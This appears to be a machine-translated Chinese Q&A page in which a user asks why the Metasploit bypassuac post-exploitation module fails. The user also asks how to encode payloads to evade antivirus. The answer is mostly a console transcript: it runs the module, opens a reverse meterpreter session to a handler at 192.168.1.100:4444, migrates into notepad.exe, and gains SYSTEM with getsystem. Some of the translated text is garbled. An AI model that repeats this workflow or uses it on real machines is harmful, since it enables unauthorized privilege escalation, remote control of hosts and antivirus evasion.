metasploit:bypassuac windows权限升级挂起

时间:2012-02-09 12:03:21

标签: metasploit

post / windows / escalate / bypassuac似乎对我失败

由于某种原因,我无法使后期开发模块bypassuac工作。 这就是我所做的:

  1. 在目标计算机上打开了一个meterpreter会话(作为NETWORKSERVICE用户)
  2. 将会话置于后台
  3. 试图使用这样的后期开发模块:

    使用post / windows / escalate / bypassuac 设置第1节 设置LHOST 192.168.1.100 设置LPORT 4444 exploit

  4. 端口尚未使用,所以应该没问题。

  5. 输出如下:

    [ - ]处理程序无法绑定到192.168.1.100:4444 []在0.0.0.0:4444上启动了反向处理程序 []启动有效负载处理程序... []将旁路UAC可执行文件上传到文件系统...... [] Meterpreter stager可执行文件长度为73802个字节。 []将代理上传到文件系统.... []完成后期模块执行

  6. 然后它返回到控制台并且什么都不做,没有新的会话,什么都没有。

  7. 我检查了以下内容:

    1. 手动将可执行程序bypassuac-x86.exe上载到目标。这完全没问题。
    2. 检查了virusscanner的警铃是否没有从可执行文件中响起。他们没有
    3. 有没有办法手动运行可执行文件,有人可以解释一下如何用SYSTEM级访问打开一个新的meterpreter会话吗?

      或者我可以以某种方式编码有效负载并使用我的自定义模板来逃避所有防病毒可能性?我还没有找到任何编码后期开发模块的选项。

      提前致谢

      Halvar

1 个答案:

答案 0 :(得分:-1)

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo